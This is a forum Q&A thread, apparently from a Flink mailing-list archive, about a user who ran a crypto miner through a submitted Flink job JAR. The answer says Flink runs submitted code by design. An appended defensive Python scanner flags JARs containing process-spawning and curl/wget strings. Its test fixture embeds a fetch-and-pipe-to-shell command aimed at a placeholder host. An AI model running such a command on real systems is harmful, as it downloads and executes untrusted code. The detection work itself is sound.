
How can we stop certain legitimate users from maliciously running illegal jobs? What protection does the Flink framework itself provide?

Something strange happened at work today. The Flink session cluster I had been using to submit jobs in session mode became a breeding ground for someone with bad intentions to run a crypto miner. On the surface he submitted a Flink job JAR; decompiling that JAR showed that it executed some shell commands that downloaded mining scripts such as C3Pool from GitHub on the public internet and ran them. Fortunately it was a test environment, and fortunately the information security department's scan caught the problem in time and traced it to the offending job JAR. Apart from setting the web.submit.enabled parameter to false, we cannot stop users from submitting legitimate jobs written against the Streaming API, because there are scenarios Flink SQL cannot cover. So how can we stop certain legitimate users from maliciously running illegal jobs? What protection does the Flink framework itself provide? *From the Flink mailing-list archive compiled by volunteers

moonlightdisco 2021-12-08 09:44:03 538 0
1 answer
  • During a security analysis of Flink, I noticed that Flink allows for remote code execution, is this an issue?

    Apache Flink is a framework for executing user-supplied code in clusters. Users can submit code to Flink processes, which will be executed unconditionally, without any attempts to limit what code can run. Starting other processes, establishing network connections or accessing and modifying local files is possible.

    Historically, we’ve received numerous remote code execution vulnerability reports, which we had to reject, as this is by design.

    We strongly discourage users to expose Flink processes to the public internet. Within company networks or “cloud” accounts, we recommend restricting access to a Flink cluster via appropriate means.

    This is what the Flink Security documentation says. It is not a problem the Flink framework itself solves; it is the job of the security team and of tools such as vulnerability scanners and threat detection. *From the Flink mailing-list archive compiled by volunteers

    2021-12-08 10:07:39
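The kind of check the answer above leaves to the security team, written here as an added example that is not part of the original thread and not Flink code: a heuristic pre-submission scan of a job JAR for the behaviour the question describes (a class that spawns a shell to download and run a script). Compiled class files keep referenced class names, method names and string literals in the constant pool as UTF-8, so a plain byte search over each entry finds references such as `java/lang/ProcessBuilder` without decompiling. The indicator list, the `scan_jar` function and the constructed sample JAR (`build_sample_jar`, with a placeholder `example.invalid` URL) are all assumptions of this example.

```python
"""Heuristic scan of a Flink job JAR for process-spawning and download indicators.

Added example, not from the thread or from Flink. The indicator set below is an
assumption for illustration; tune it to the code base you actually accept.
"""
import io
import re
import zipfile
from dataclasses import dataclass, field

# Each rule fires only when ALL of its byte strings appear in one JAR entry.
# Runtime alone is common in benign code (availableProcessors etc.), so it is
# paired with the "exec" method name that would also sit in the constant pool.
EXEC_RULES = {
    "ProcessBuilder": (b"java/lang/ProcessBuilder",),
    "Runtime.exec": (b"java/lang/Runtime", b"exec"),
    "shell interpreter path": (b"/bin/sh",),
    "bash interpreter path": (b"/bin/bash",),
    "curl download": (b"curl ",),
    "wget download": (b"wget ",),
}
URL_PATTERN = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")


@dataclass
class ScanResult:
    # entry name -> names of the rules that fired for it
    suspicious_entries: dict = field(default_factory=dict)
    # every URL literal found anywhere in the JAR, for analyst review
    urls: set = field(default_factory=set)

    @property
    def flagged(self) -> bool:
        return bool(self.suspicious_entries)


def scan_jar(jar_bytes: bytes) -> ScanResult:
    """Scan every file entry of an in-memory JAR and report rule hits and URLs."""
    result = ScanResult()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for info in jar.infolist():
            if info.is_dir():
                continue
            data = jar.read(info.filename)
            hits = [name for name, needles in EXEC_RULES.items()
                    if all(n in data for n in needles)]
            if hits:
                result.suspicious_entries[info.filename] = hits
            for match in URL_PATTERN.findall(data):
                result.urls.add(match.decode("ascii", "replace"))
    return result


def build_sample_jar(include_loader: bool = True) -> bytes:
    """Constructed sample JAR: a benign job class, optionally plus a loader class
    whose constant pool references ProcessBuilder and a shell download command.
    The class bodies are fake (magic number plus constant-pool-like strings)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\nMain-Class: com.example.WordCount\n")
        jar.writestr("com/example/WordCount.class",
                     b"\xca\xfe\xba\xbe"
                     b"org/apache/flink/streaming/api/datastream/DataStream"
                     b"flatMap")
        if include_loader:
            jar.writestr("com/example/Loader.class",
                         b"\xca\xfe\xba\xbe"
                         b"java/lang/ProcessBuilder" b"/bin/sh" b"-c"
                         b"curl -s https://example.invalid/setup.sh | sh")
    return buf.getvalue()


if __name__ == "__main__":
    report = scan_jar(build_sample_jar())
    for entry, rules in report.suspicious_entries.items():
        print(f"REJECT {entry}: {', '.join(rules)}")
    for url in sorted(report.urls):
        print(f"URL literal: {url}")
```

This is a triage gate for the submission path (a CI step or a wrapper around the REST/CLI submit), not a sandbox: as the quoted FAQ says, Flink runs whatever it is given, so a JAR that passes still has full process, network and file access. Connectors or user libraries that legitimately use `ProcessBuilder` will trip it, so keep an allowlist of known-good artifacts and combine the check with the network restrictions the answer recommends and the `web.submit.enabled: false` setting the question already uses.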